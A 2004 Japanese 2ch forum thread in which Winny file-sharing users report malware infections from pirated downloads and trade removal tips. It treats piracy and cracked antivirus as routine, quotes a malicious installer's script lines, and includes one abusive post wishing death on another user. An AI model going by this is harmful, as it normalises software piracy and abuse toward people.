    l ` / !  ,/    \__   /     テ      ヽj   'ー'' ⊆) '⌒`  !   K
     Y_,,. -‐''"_,,,.. -‐'",,..ノ  /     ク        l     ヘ‐--‐ケ   }   札
   (´,.-‐ニニ=、-─‐-''",. -‐'"´7、     相        ヽ.     ゙<‐y′   /   で
.    `゙ゝ〈 /\ヽフニく ̄./ 「`y´ \   談     (ヽ、_,.ゝ、_  ~  ___,ノ ,-、  聞
       |  ヽ<,.>-‐ニ-‐''" i   i   室     )           ノ/`'ー-' <  く
       ゙、   {8   =O=  |   }   で   r'/,   _..   //  l、、、ヽ_) と
       \  io       ト-─''〉  聞    ゝ(_/_ノ´ /ヽ_ノ/  __,l ヽ)_)‐'  い
         \_ヽ  __,,.. /| .ノ丿ノ   く        {` ーニ[二]‐ク′      い
         .__ |  ̄||   |  しノ'"    と          〉   /  /_      よ
      ,.:'"O  `゙--- || ─┴-─-.、    い        /   ´ ̄`ヽ  )
      {        jl   °     0゙;   い         (____ノ--'
       ̄ ̄ ̄ ̄ ̄ `──‐-----   よ




787 :[名無し]さん(bin+cue).rar:04/02/27 18:48 ID:Tk4X7YAc
CDのオートランをレジストリを直接いじって切れないやつは
いじくるつくーるを使え。

788 :[名無し]さん(bin+cue).rar:04/02/27 18:58 ID:UvZ05FTQ
>>784
すまそzip.mp3でした
これは安全と言う事でいいんでせしょうか

789 :[名無し]さん(bin+cue).rar:04/02/27 19:04 ID:yeXWvkT/
>>788
アルバムの無圧縮zipだから大丈夫でしょ。一応ウイルススキャンしてね

790 :[名無し]さん(bin+cue).rar:04/02/27 19:43 ID:pag5B/dh
mpgやavi開いてフォーマットされる事ってあります?


791 :[名無し]さん(bin+cue).rar:04/02/27 20:01 ID:YGUjVC3c
>>790ならありえるだろう


792 :766:04/02/27 21:24 ID:gkTFJfqP
可能か否かは別として、

・Winny.exeのプロセス内でメールを送信するウイルス
・接続相手がファイル転送用ポートに25番を設定している

考えられるのはこんなところでしょうか。
FWソフト使っているのであれば、どこに(IPとかホスト)接続しようとしていたのか、ログに残ってないですか。

793 :766:04/02/27 21:26 ID:gkTFJfqP
>>792
>>775へのレスです。レス番号付け忘れました。


794 :[名無し]さん(bin+cue).rar:04/02/27 22:26 ID:yuzbKUo+
>>785
死ねよクズ。リンク先のそいつの書き込みに対するスレ見りゃそいつがどんなやつかわかるだろ。マジで死ね。
何で地下鉄サリン事件のときに死んでくれなかったんだよ。社会のゴミ。

795 :[名無し]さん(bin+cue).rar:04/02/27 22:40 ID:rkvYWK/c
キチガイ登場

796 :[名無し]さん(bin+cue).rar:04/02/27 22:52 ID:GpsU2Fcr
>>775
>>792さんが書いてるとおり
25番だけじゃなく変なポート設定してるの多いぞ
特にあほーべーべーw

ログ見るとほとんどがポート規制くらってるとこばっかり

797 :[名無し]さん(bin+cue).rar:04/02/27 23:01 ID:z6TuwM1D
>>781
スマンテックの危険性評価グラフにならうと、
被害状況不明、ダメージ高、感染力低って感じ。相変わらず実行しない限り無害。(多分)

ただ、実行したが最後起動しなくなりますた。虫入りのファイルも消したのでファイル名やハッシュもわからん。
試してみたいヤツは今週分のエロゲーの中から探してくれ。Readmeも内容変わってた。詳しく読んでおけばよかったなぁ……。

798 :[名無し]さん(bin+cue).rar:04/02/27 23:04 ID:yeXWvkT/
>>797


799 :[名無し]さん(bin+cue).rar:04/02/28 00:13 ID:5+9R5/V2
>797
そのエロゲーのタイトル教えてくれ,試してみたい

800 :[名無し]さん(bin+cue).rar:04/02/28 00:21 ID:7UnQfWlo
引っかかってしまいました。
zipファイル中に.txt___________.exeが混ざっていまして、実行と同時にコマンドプロンプト
のような画面が出たので慌てて閉じたので最後まで実行してはいないと思うのですが
以後マイドキュメントに適当な名前で.txt__.exeの複製が数個作られ、
『私は[ユーザー名]。antinnyの作者だ.zip』ファイルが作られます。
あとリモートアシスタンスの招待がonにされていたようです。

ぬるぽ系の様ですがウィルススキャンにも引っかからなかったので
ついやってしまいました。

801 :[名無し]さん(bin+cue).rar:04/02/28 00:21 ID:h2eIly0y
>>799
[20040227]大好きな先生にHなおねだりしちゃうおませなボクの/私のぷにぷに(GAME+OST).rar 895,976,248
1ee6262e6115628b29277c8ab4fb5f41

802 :[名無し]さん(bin+cue).rar:04/02/28 01:22 ID:AvCQBMaN
>>801
それ全部タイトルかよw

803 :[名無し]さん(bin+cue).rar:04/02/28 01:51 ID:p/PrHMnB
誰かはわからんが、WFDへの報告乙

804 :[名無し]さん(bin+cue).rar:04/02/28 02:05 ID:L7RSS1Ui
DOS窓開くトラップに引っかかった。

今の所異常はないけど、時限式か?

805 :[名無し]さん(bin+cue).rar:04/02/28 02:45 ID:wJn30xQd
スマン 誰か>>352の誘導先のスレ名だけでもイイから教えてホスィ
>>349と同じ現象に陥っているのだが
dat落ちしてて何のスレなのかワカランのよ・・・(つд`)

806 :805:04/02/28 02:46 ID:wJn30xQd
ageちまった・・・ _| ̄|○

807 :[名無し]さん(bin+cue).rar:04/02/28 02:52 ID:gHqX08hI
ネット関係 [Download] “落としたファイルに関する初心者質問スレ12”

808 :[名無し]さん(bin+cue).rar:04/02/28 02:54 ID:d0eot10d
>>805
「落としたファイルに関する初心者質問スレ」
新スレは立ってないみたいでつね。

809 :[名無し]さん(bin+cue).rar:04/02/28 02:58 ID:wJn30xQd
>>807-808
アリガト! スレが倉庫逝くまでマターリ待つYOヽ(´ー`)ノ

810 :[名無し]さん(bin+cue).rar:04/02/28 02:58 ID:w9hwEoCO
download.co.jp@tmp2 過去ログ墓場 # index
http://makimo.to/2ch/tmp2_download/index.html

811 :[名無し]さん(bin+cue).rar:04/02/28 03:17 ID:HNUbmEXg
先ほど、Winnyで"Yahoo!BB顧客情報リスト 漏れたて新鮮 悪用厳禁(txt)"をDLしました。
中にあった"Yahoo!BB顧客情報,txt.exe"を開いたところ一瞬コマンドプロンプトに、
コピーしていますと表示され、その後、自動で再起動しました。
再起動後、通常通り立ち上がりますが、デスクトップがこれまた、一瞬表示された後
ログオフしますか?というウインドがでて、ずっと表示されたままです。
ウイルスでしょうか?ノートンは反応しませんでした。
どなたかお知恵をお貸しください。お願いします。

812 :[名無し]さん(bin+cue).rar:04/02/28 03:21 ID:ihP2KPKg
なんの疑いも無くtxt.exeなんか実行出来るのが凄いな。

813 :[名無し]さん(bin+cue).rar:04/02/28 03:22 ID:w9hwEoCO
>>811
おそらくウイルスだと思うけど。
どうしてそんな怪しげなexeファイルを実行するかな、、、

>ログオフしますか?というウインドがでて、ずっと表示されたままです。
その状態でここに書き込めるのか、というツッコミもしといた方がいいのかな?

814 :[名無し]さん(bin+cue).rar:04/02/28 03:23 ID:HNUbmEXg
ノートンが反応しなかったものですから。迂闊でした。

815 :[名無し]さん(bin+cue).rar:04/02/28 03:24 ID:DfBgfam3
>ノートンは反応しませんでした。

何度同じ事を(ry
間違いなくウイルスだよ。クリーンインストールでもしてくれ

816 :[名無し]さん(bin+cue).rar:04/02/28 03:36 ID:HNUbmEXg
>>813
ツッコミご容赦ください。妻のPCから書き込みしています。

>>815
クリーンインストールしかないのでしょうか?

セーフモードだと起動するのですが...


817 :[名無し]さん(bin+cue).rar:04/02/28 03:39 ID:ihP2KPKg
Winnyやるまえに、もっと覚えることがあるだろうに。

818 :[名無し]さん(bin+cue).rar:04/02/28 03:39 ID:wJn30xQd
>>816
妻に謝れ

819 :[名無し]さん(bin+cue).rar:04/02/28 03:40 ID:MAyZ5xfJ
>>816
セーフモードで中途半端に復旧するより、
クリーンインストールした方が確実

820 :[名無し]さん(bin+cue).rar:04/02/28 03:52 ID:HNUbmEXg
>>817
>>816
お言葉ごもっともです。

>>819
やはり、クリーンインストでしょうか?

Windows,System32の中に新しいファイルは作成されていないようなのですが、
レジストリでしょうか?

ちなみに、"Yahoo!BB顧客情報,txt.exe"解凍後のファイルサイズは142KBでした。
Winnyでの参照はまだ一桁台でした。

821 :[名無し]さん(bin+cue).rar:04/02/28 03:59 ID:2lCtlgtU
今ごろ、もせ落としてるばかからです。
拡張子が zip.mp3.lzh なんぞ、初心者の方は即刻ファイル削除しましせう。

「かくちょうし」がわからんか?

822 :[名無し]さん(bin+cue).rar:04/02/28 04:01 ID:HNUbmEXg
尚、Yahoo!BB顧客情報,txt.exeをメモ帳で開くと最後の方に

The comment below contains SFX script commands
Setup=null.bat
TempMode
Silent=1
Overwrite=1
というようなことがかかれています。
ググッてみてもなんのことやらです。

>>819
悪あがきしてすいません。
なんとかしたいものですから...

823 :[名無し]さん(bin+cue).rar:04/02/28 04:11 ID:n/FmhdYl
>>822
どうにもなりません。自業自得。

824 :[名無し]さん(bin+cue).rar:04/02/28 04:20 ID:MAyZ5xfJ
>>822
少なくともnull.batを呼び出して実行している
このnull.batは落としたファイルに圧縮されている物と思われる
そしてnull.batを実行する時、情報表示なし、上書きするが
指定されている

問題はnull.batの中身
これさえ解かれば何とか手を打てる方法があるかも知れないが
現状では厳しい状況だろうな・・・・

825 :[名無し]さん(bin+cue).rar:04/02/28 04:22 ID:gHqX08hI
別HDDにOSをインストして要る物をコピーするとか

826 :[名無し]さん(bin+cue).rar:04/02/28 04:32 ID:glAwKb0w
ウイルスバスターを落としたとしてシリアル番号が付いててもその番号は誰かが使ってるわけだから
オンラインアップデートする時におかしいとか思われませんかね?トレンドマイクロに




827 :[名無し]さん(bin+cue).rar:04/02/28 04:34 ID:n/FmhdYl
そんなとこまで気にしてられないわけです

828 :[名無し]さん(bin+cue).rar:04/02/28 04:34 ID:xd1vCZJy
せめて、アンチウイルスソフトぐらい買おうな・・・
そこまでケチらんでもいいだろ

829 :[名無し]さん(bin+cue).rar:04/02/28 04:35 ID:glAwKb0w
>>827
じゃあ普通に落としても平気?

あとkeygenってやつが有るらしいけどそれ使えば大丈夫なのかな?

830 :[名無し]さん(bin+cue).rar:04/02/28 04:35 ID:glAwKb0w
>>828
貧乏で悪いね(´・ェ・`)

831 :[名無し]さん(bin+cue).rar:04/02/28 04:41 ID:uAbv86pi
バスター落とすなんて(ry

832 :[名無し]さん(bin+cue).rar:04/02/28 04:43 ID:HNUbmEXg
>>824
ありがとうございます。

もう一度セーフモードで起動して、システム構成ユーティリティの
スタートアップを見てみました。そうしたら、スタートアップ項目に
explorerがあり、コマンドのタブにexplorer.exe -rというももがありました。
通常見慣れないものでしたので、チェックを外して起動したところ今回は
Logoffのウインドが現れず、起動できました。一応良かったのですが、
もう一度チェック入れて起動してみます。

833 :[名無し]さん(bin+cue).rar:04/02/28 04:44 ID:glAwKb0w
>>831
略さんで言ってくれ・・・マジで

834 :[名無し]さん(bin+cue).rar:04/02/28 04:55 ID:yzC1Egzh
コマンドプロンプトが起動して、コピーしていますって一瞬でて、
画面真っ暗になって電源切れたんだけど・・・
今、何事も無く起動してるんだが、これなに?

835 :[名無し]さん(bin+cue).rar:04/02/28 04:57 ID:xd1vCZJy
分かるはずがない

836 :[名無し]さん(bin+cue).rar:04/02/28 04:59 ID:HNUbmEXg
やはり、チェックを入れるとLogoffのウインドが表示されます。
ちょっと気持ち悪いですが、起動できたので暫くこのまま使ってみようと思います。

837 :[名無し]さん(bin+cue).rar:04/02/28 04:59 ID:SPXTNkUO
>>833
漏れマカフィーだからよく知らんけど
バスターってオンライン登録しんと
インスコできんじゃなかったっけ?

オンライン登録すると(ry
http://tmp2.2ch.net/test/read.cgi/download/1074960021/151-175

ノートンは割れでも使えるとか

838 :[名無し]さん(bin+cue).rar:04/02/28 05:12 ID:TGqdyDpX
>>837
しかしそのスレ、すっごい会話してるな・・・。

839 :[名無し]さん(bin+cue).rar:04/02/28 07:44 ID:QlnYf3j8
801で見事に食らっちまいました

仮想化したとたん一瞬ブラックアウトしてから、画面三分の一ぐらいが黒くなり、
怪しい音とともにオレンジのバーが展開されていく

で、タスクマネージャーが反応しなかったので電源をぶっこ抜いて再起動
再起動後また同じ現象
でも今度はDOS窓が開いていて、タスクマネージャーから閉じたら止まった

110G中40Gを消されました
システムは別のパーティションだったから逝きませんでした

ちなみに半分以上のデータは「復元」によって復活できました
消していく順序はABC・・・の後にあいうえ・・・というような感じです

ちなみにこれの本体はdub.exeでした
消す速度はそんなに速くないような感じ タスクマネージャーを開く余裕もあるし
で、データ上書きはされていないので、途中で止めれば大体復活させられます

以上レポートでした

840 :[名無し]さん(bin+cue).rar:04/02/28 09:51 ID:Qpt7KmQx
動画がexeファイルに変換され始めてどんどん汚染されていくんですが対処する方法おしえてもらえませんか?

841 :[名無し]さん(bin+cue).rar:04/02/28 10:23 ID:0+LJTKA2
それに負けない速さでバックアップ

842 :[名無し]さん(bin+cue).rar:04/02/28 10:26 ID:g4Ox7q/s
>>840
まずはフォルダごとセキュリティのアクセス許可で拒否する。
9x系なら読み取り専用に。

843 :[名無し]さん(bin+cue).rar:04/02/28 10:43 ID:Qpt7KmQx
やってみます。根本的に解決するには再インスコしかないんでしょうか?

844 :[名無し]さん(bin+cue).rar:04/02/28 10:43 ID:Qpt7KmQx
データが壊れてゆくー
悲しい・・・

845 :[名無し]さん(bin+cue).rar:04/02/28 10:57 ID:0+LJTKA2
そして、それに負けない速さでバックアップ

846 :[名無し]さん(bin+cue).rar:04/02/28 11:11 ID:Qpt7KmQx
バックアップしたらどうすればいいでしょうかね?


847 :[名無し]さん(bin+cue).rar:04/02/28 11:13 ID:g4Ox7q/s
>>846
OS書け。
とりあえずCtrl + Shift + Esc押してみてなんか出たら
プロセスタブにあるもの全部晒しなさい。

848 :[名無し]さん(bin+cue).rar:04/02/28 11:23 ID:Qpt7KmQx
Win2000です
プロセスタブにはあやしいというか見たことないようなものはないですねー

849 :[名無し]さん(bin+cue).rar:04/02/28 11:25 ID:Qpt7KmQx
読み取り専用にしたことでとりあえずは侵食が止まってますが
気持ち悪い感じです

850 :[名無し]さん(bin+cue).rar:04/02/28 11:32 ID:g4Ox7q/s
>>848
svchost.exeに付くやつかな?

851 :[名無し]さん(bin+cue).rar:04/02/28 11:32 ID:CgQYuERO
>>849
とりあえずバスターのオンラインスキャンでもしる。

852 :[名無し]さん(bin+cue).rar:04/02/28 11:40 ID:Qpt7KmQx
いや、ウイルスチェックにかけてもなんにもでてこないんですよー

853 :[名無し]さん(bin+cue).rar:04/02/28 15:21 ID:fG/OOEuG
[040227] 鳥籠 GameDisc(iso).rar BCFG8na4y9
717,707,279 7b90d7f74fadb43c389a10448d1584f8

これ、setup.exe起動したら、「悪さはだめだよーん」とか
のダイアログ表示されたので、即差に強制終了。
Win2kを再起動し、ログオン時、自動でシャットダウン
しちゃけど、対処方法希望。

ちなみに、winnt配下に、setup.exe(鳥篭のアイコン絵)
がいたので削除したら、問題なくなった。


854 :[名無し]さん(bin+cue).rar:04/02/28 16:27 ID:/dlqKs9O
>>851
マイコンピュータのプロパティーで使用者名が
「Winnyで違法ファイル集めてます(^^)v」になってないかい?


855 :[名無し]さん(bin+cue).rar:04/02/28 18:37 ID:q6qCIoVc
ウイルスチェックしない奴とCDドライブのオートラン切ってない奴は逝ってよし。

856 :[名無し]さん(bin+cue).rar:04/02/28 18:56 ID:Qpt7KmQx
>>854
あっ、なってます。
解決策知ってる方おしえてください

857 :[名無し]さん(bin+cue).rar:04/02/28 18:57 ID:Qpt7KmQx
いつ感染したんだろう?
どうしてアンチウイルスソフトから漏れたんだろう?新種ですか?

858 :[名無し]さん(bin+cue).rar:04/02/28 19:02 ID:Qpt7KmQx
過去レス読んで再インすコなさそうだとわかりました

859 :[名無し]さん(bin+cue).rar:04/02/28 19:54 ID:OuXYApTF
今気がついたんだが、Shiftキー押しながらマウントすれば自動起動しないっぽい?
誰か確認よろ。

860 :[名無し]さん(bin+cue).rar:04/02/28 20:09 ID:8EmqcORT
.>859
基本だろーが

861 :[名無し]さん(bin+cue).rar:04/02/28 20:29 ID:AVWup9SW
>>145
うわ!俺 赤服男のファイル見ちゃってるよ。
ウイルスバスターは反応しなかったのに。とほほ…

これって、どういったウイルスが仕込まれてるんですか?


862 :[名無し]さん(bin+cue).rar:04/02/28 20:35 ID:gHqX08hI
時限式のHDDフォーマット

863 :[名無し]さん(bin+cue).rar:04/02/28 20:44 ID:77mwpPm6
そんなファイルサイズでも仕込めれるの?

864 :861:04/02/28 20:46 ID:AVWup9SW
>>862
これ、ウイルス対策ソフトのメーカーはまだ認知してないということですか…

ご存知でしたら、修正方法を教えて頂けないでしょうか?



865 :[名無し]さん(bin+cue).rar:04/02/28 20:48 ID:ihP2KPKg
赤服男って1回見てみたいなぁ。どっかにうpしてくれない?

866 :[名無し]さん(bin+cue).rar:04/02/28 21:02 ID:F0J/Ebjb
>>864
過去ログ1000回嫁

867 :[名無し]さん(bin+cue).rar:04/02/28 21:18 ID:RRJ2Gckw
>>861

868 :[名無し]さん(bin+cue).rar:04/02/28 21:59 ID:VmcTKL9s
ひとこと言っておく。
自分で解決できない椰子、あぼーんしても鼻歌交じりでリカバリしちまえーと割り切れない椰子、
VPCとかで走らせりゃいいやーって手間をかけられない椰子。
そういう椰子どもはダウソしたものを2週間寝かせてからインスコ汁。
そうすりゃウィルス対策メーカーが対処してくれているだろうから、そこそこ安心だろ。

869 :861:04/02/28 22:57 ID:AVWup9SW
>>866
どうもすいませんでした。ググッたらわかりました。
ぬるぽ被害者の副産物で、画像自体は安全ということのようですね。

870 :[名無し]さん(bin+cue).rar:04/02/28 23:29 ID:L7RSS1Ui
ノートンのシステムスキャンでトロイの木馬も検出できますか?

871 :[名無し]さん(bin+cue).rar:04/02/28 23:33 ID:h2eIly0y
なんだかんだで自己防衛が一番。


872 :[名無し]さん(bin+cue).rar:04/02/28 23:59 ID:PXl0jhFn
まあお前らエイズにかからなくてよかったじゃん
風俗いってエイズにかかったーなんていったら
マジ笑えないぞ
HDなんかそれに比べりゃ屁ともねーだろ

873 :[名無し]さん(bin+cue).rar:04/02/29 00:01 ID:pQXFlusE
┌―――――――――┐
|  頭のいかれた方が  |
└―――――――――┘
      ヽ○/
       |ヘ
      <



                 ―    ┌―――――――――┐
                 ―    |   いらっしゃいます |
                 ―    └―――――――――┘
       ○ノ
     _ ノ ̄
       >

874 :[名無し]さん(bin+cue).rar:04/02/29 00:03 ID:Mc0DQllX
キャッシュが減ってるんだけどなぜ?
削除ツールは使ってなかったんだけど・・・

875 :[名無し]さん(bin+cue).rar:04/02/29 00:09 ID:qsJJTFWH
UPフォルダにダウソファイル入れてない?

876 :[名無し]さん(bin+cue).rar:04/02/29 00:31 ID:Mc0DQllX
>>875
874ですが私のことでしょうか?
Winnyを起動するとフォルダ情報にUPフォルダが追加されてて
開くと落としていないエロファイルなどいろいろあります。
気持ち悪いので起動のたびに削除しています。
なにか間違っていたら教えてください。



877 :[名無し]さん(bin+cue).rar:04/02/29 00:33 ID:pQXFlusE
ぬるぽ

878 :[名無し]さん(bin+cue).rar:04/02/29 01:06 ID:N5d/aNhs
使途が速いかカスパーが速いか勝負だな

879 :[名無し]さん(bin+cue).rar:04/02/29 01:32 ID:mEzJP3qH
ダメです! 侵食止まりません!

880 :[名無し]さん(bin+cue).rar:04/02/29 01:57 ID:uGkNpZKM
パターン青!使途です!

881 :[名無し]さん(bin+cue).rar:04/02/29 02:13 ID:9kAiK+mV
1年ぶりだな・・・
ああ・・・使途だ。

882 :[名無し]さん(bin+cue).rar:04/02/29 03:11 ID:0q59GwnI
総員第一種戦闘配置!

883 :[名無し]さん(bin+cue).rar:04/02/29 04:31 ID:NE4BQ70C
('A`)お前ら楽しそうだな

884 :[名無し]さん(bin+cue).rar:04/02/29 04:56 ID:YwIo0WSB
気が付いたらTempフォルダにsvchost.exeがあった・・・
いつからあるのかわからないが・・・、怖い・・・!

885 :[名無し]さん(bin+cue).rar:04/02/29 06:38 ID:e1y1vomC
俺も気が付いたらSystem32フォルダにsvchost.exeがあった・・・
いつからあるのかわからないが・・・、怖い・・・!

886 :[名無し]さん(bin+cue).rar:04/02/29 06:59 ID:IKi7YFqQ
>>885
真に受ける香具師がいるからヤメレ!

887 :[名無し]さん(bin+cue).rar:04/02/29 09:21 ID:6yhhXkFe
>>857
たぶん新種のアンチニーだと思われる。
ウイルスバスターもノートンも今のところ対策してない模様。
っていうか対策する気なしって気がする。俺 二週間くらい前から感染してる
けど今だUPdateなし。
たぶんwinny専用ウイルスなんで、違法ファイルやりとりしてるヤツらのこたー
しったこっちゃね!って事だと思われる。

888 :[名無し]さん(bin+cue).rar:04/02/29 09:57 ID:uUoO8DTf
svchost.exeはnyのクラックバージョンにもれなくついてくるトロイです。

889 :[名無し]さん(bin+cue).rar:04/02/29 09:58 ID:+xDjuXyd
         n    人     人     n
       (ヨ )  (_ )   (_ )   ( E)
       / |  (__)   (__)   | ヽ
       \人/( ・∀・ )/(・∀・ )ヽ/人
   _n    (_ )u     /     uu) (_ )
  ( l   (__)     ∧     /  (__)
   \ \ (・∀・ )            ( ・∀・ )     n
    ヽ___ ̄ ̄  )   う ん こ !   ̄     \    ( E)
      /    /             フ     /ヽ ヽ_//




890 :ピエト炉 ◆pietroLvxc :04/02/29 10:50 ID:251xe54D
【ピエト炉系列板】
                    (炉 ̄∇ ̄)
               ___( っ   )っ
               |     し (_)  .|←マイルーム
               |    【ダウソ】 . |
            | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
            |      ∧∧ ∧_∧  .|  
            |(●´ー`)(,,゚Д゚)(; ´Д`) .|←リビング
            | 【モ狼】【大受】【ラウンコ】|
         | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
         | /■\ ∧_∧ ∧_∧ ((( )))|
         |(  ・_ゝ・)(  ゚_ゝ゚)( `_ゝ´)( ´_ゝ`).|←キッチン
         | 【スロ】 【競馬】 【厨房】 【ν速】 |
   | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
   | ∧_∧  ∧_∧   ∧_∧   ∧_∧  [ ̄ ̄ ] |←風呂
    | <ヽ`∀´>. ミ  ゚_ゝ゚彡 ( ゚く_ ゚  ) (・∀・ ) ( ´∀`) .|
   | 【最悪】  【半角】   【独男】  【ネトゲ】 【ゲーム】 |
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
|                    他板(トイレ)           .|
. ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
.   ,___,_ 
   i___!_   ∧糞∧.   (彡0ミ )  ∧_∧  /厨\ 
  ( ´_ゝ`)   <ヽ`∀´>  ( `Д´) ( ´ω` ) ( `ハ´)  
 【削除人】    【糞コテ】   【DQN】   【ヲタ】  【厨房】

   ↑↑↑↑ピエト炉に逆らう馬鹿ども↑↑↑↑

891 :[名無し]さん(bin+cue).rar:04/02/29 11:02 ID:UiaTgS/v
svchost.exeを騙ったワームか。
調べてみると、大文字だと感染の疑いがあるみたいだ。
小文字の場合は大丈夫ぽ?

892 :[名無し]さん(bin+cue).rar:04/02/29 13:17 ID:VIfZx3A2
>>891
大丈夫と言った瞬間に、小文字版を作る奴が出てくると思う。

893 :[名無し]さん(bin+cue).rar:04/02/29 18:10 ID:N3i3ug9g
>>892

(((( ;゚Д゚)))ガクガクブルブル

894 :[名無し]さん(bin+cue).rar:04/02/29 18:41 ID:kszJWahA
非公式サイト
いまのところノードとか置いてるだけ。。。
カスタムWinnyがワンポイント通れるようになればここで配布します。

ttp://home.graffiti.net/revival_winny/

895 :[名無し]さん(bin+cue).rar:04/02/29 23:20 ID:nSnaX0WU
タスクでみると、svchost.exeが6個あるんですが皆さんもこんなものなのでしょうか?

896 :[名無し]さん(bin+cue).rar:04/02/29 23:24 ID:Q5IGjWOf
>>895
私5個ですが

897 :[名無し]さん(bin+cue).rar:04/02/29 23:26 ID:wUTm2Re3
>>895
俺は4個だけど

898 :[名無し]さん(bin+cue).rar:04/02/29 23:27 ID:4gFQ1gAh
漏れ0個・・・

899 :[名無し]さん(bin+cue).rar:04/02/29 23:31 ID:ERW7xOow
5個
システム3
ネットワーク1
ローカル1

900 :[名無し]さん(bin+cue).rar:04/02/29 23:34 ID:SmXVzTAy
おいらは
システム2
ネットワーク1
ローカル1

901 :[名無し]さん(bin+cue).rar:04/03/01 00:00 ID:OtnukaQx
ところで赤福の男って.jpg開かなきゃ大丈夫なの?
どんな画像か教えて?俺それみたかもしれん。
なんか開きはしなかったけど小さい画面でみたら変なお宅の画像だった。
誰かそのお宅の画像張って

902 :[名無し]さん(bin+cue).rar:04/03/01 00:13 ID:rrZ0nzE4
勝手にUPフォルダが作られるようになったので、antinnyに感染したと思い
>>1にある対策をやろうとしたのですが、
nyのフォルダにupフォルダが見つからず
ProgramFilesを検索してもアイコンがフォルダなexeがなく
TempにNy.exeもなく
win.iniにぬるぽもありません
ウィルス・バスターにはひっかかりませんでした。
これってなんでしょうか。


903 :[名無し]さん(bin+cue).rar:04/03/01 00:18 ID:rYKBDM5R
>>902
私も同じで対策とったんだけど
どこにも見当たらないです。

904 :902:04/03/01 00:27 ID:rrZ0nzE4
いま、も一度win.iniをよく見たら
win.iniの最後の2行に ぬるぽ ではなくて
[hoge]
hoge=C:Winny2\
とあったんですが、これが ぬるぽ にあたるんでしょうか。

905 :[名無し]さん(bin+cue).rar:04/03/01 00:36 ID:/wEZhOCr
>902

パターンファイルに登録されていなければ検知不可能
亜種の中にはノートンやバスターのパターンファイルに登録されてないモノもある
ってゆうか登録されていないモノの方が多い悪寒

亜種だから既知のモノとは活動パターンが違い打つ手無し
直したければHDDのフォーマットなんてこともある

1行目と2行目は矛盾していませんか?
>勝手にUPフォルダが作られるようになったので
>nyのフォルダにupフォルダが見つからず
どこにUPフォルダが作られたの?

>904

そうですね hoge なんてふざけた項目がある分けないし確実に亜種
過去にはぬるぽの変わりに 山崎渉 があたっとゆう報告例もありましたよ
ネタかもしれませんけど

906 :[名無し]さん(bin+cue).rar:04/03/01 00:38 ID:D1mzu5Zi
ぬるぽの亜種でたね。

907 :[名無し]さん(bin+cue).rar:04/03/01 01:03 ID:4AGKgU6O
C言語でhogeってあったような希ガス。
でも亜種だろうね。おめでとう。

どのファイルで感染したかが気になるところ。

908 :902:04/03/01 01:14 ID:rrZ0nzE4
>>905
nyを起動するとフォルダ情報に作ったおぼえのないUPフォルダが
C:\Winny2\Upとでるんですけど、エクスプローラからはみえないということです。
WinnyからそのUpフォルダをひらけるし、ウイルス・バスターでウイルス検索しても
C:\Winny2\Upを検索してるから存在してるんだろうけど、どこにあるのかわかりません。
症状としてはそのUpフォルダにファイルのコピーをupし、コピーした
ファイルに「晒し上げ」の文句と一緒に感染したパソコンの使用者名をくっつけます。
私はnyをはじめてまだ間がないので、キャッシュがほとんどなく、感染に気づき>>1の対策では対処できなかった時に
nyごと削除したので、それがキャシュを消すのかどうかはわかりません。
いったいどのファイルにくっついてたのか、もちろんexeなどには気をつけていたのですが、
わかりません。


909 :[名無し]さん(bin+cue).rar:04/03/01 01:17 ID:pgB6lqnw
>>908
>C:\Winny2\Upとでるんですけど、エクスプローラからはみえない

MSDOSプロンプトを起動し、以下のように打ってみて。( > は打たなくて良い)

> C:
> CD Winny2
> DIR /AHS

910 :909:04/03/01 01:18 ID:pgB6lqnw
ごめん修正

× CD Winny2
○ CD \Winny2

911 :[名無し]さん(bin+cue).rar:04/03/01 01:53 ID:I0U7AJXv
フォルダオプションの「すべてのファイルを表示する」でいいんじゃないの?

912 :[名無し]さん(bin+cue).rar:04/03/01 01:56 ID:+OGQ91l2
>>911
うむ。

913 :[名無し]さん(bin+cue).rar:04/03/01 02:09 ID:kfMJzVam
ANTINNYに感染してることが分かったんですが、
削除の方法がいまいちわかりません。

ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.A

ここに従ってやろうと思ったのですが
「値:“ara-key= <ワームのファイルの場所> -StartUp”」のあたりからどうすればいいのか分かりません
ここから先どうすればいいか教えてください。
OSはXPです。

914 :902:04/03/01 02:09 ID:rrZ0nzE4
いろいろありがとうございます。
明日、仕事なもので今日はもう寝ます。
なんとかならないかもう一度やってみるつもりですが、忙しいので
やるとしたら次の休みの時になりそうです。

Winnyのような事をはじめるんだから気をつけないとな、と思っていた矢先の
できごとでした。
みなさんもお気おつけください。

915 :[名無し]さん(bin+cue).rar:04/03/01 02:15 ID:tCeUr7BX
>>913
レジストリエディタで当該項目を自分で削除すればいいんですよ。
まさか「レジストリエディタって何?」ってこのスレで訊いたりはしませんよね?ね?


916 :[名無し]さん(bin+cue).rar:04/03/01 02:15 ID:Q9SFeUGY
【安定】ウイルスバスター2004 Part14【安心】
http://pc.2ch.net/test/read.cgi/sec/1077518579/

558 名無しさん@お腹いっぱい。 sage New! 04/03/01 01:19
msstkprp32.exeとmsisam.exeとか言うのが突然www.accs.or,jpにアクセスし始めたんだが
どうもPCが重いからタスクマネージャ見たらSystemとmswsockdrv.exeでCPU食いつぶしてるし
結局日付をずらしたら収まった
んで、ACCSのサイトいま落ちているもよう。
とりあえず上のプロセス殺さないとCPUが100%でなにも出来ん。
これはACCS攻撃ウィルスじゃないのか?3月1日0時から動き出したような感じ。
誰か同じ状態の人いますか?


917 :[名無し]さん(bin+cue).rar:04/03/01 02:33 ID:kfMJzVam
>>915
正直聞きたいんですが。。。PCについては全然わかってないもので_| ̄|○
でも>>22に載ってるやりかたで削除できました
レジストリについては自分で調べます。
いろいろとご迷惑おかけしました。

918 :[名無し]さん(bin+cue).rar:04/03/01 03:12 ID:4AGKgU6O
>916
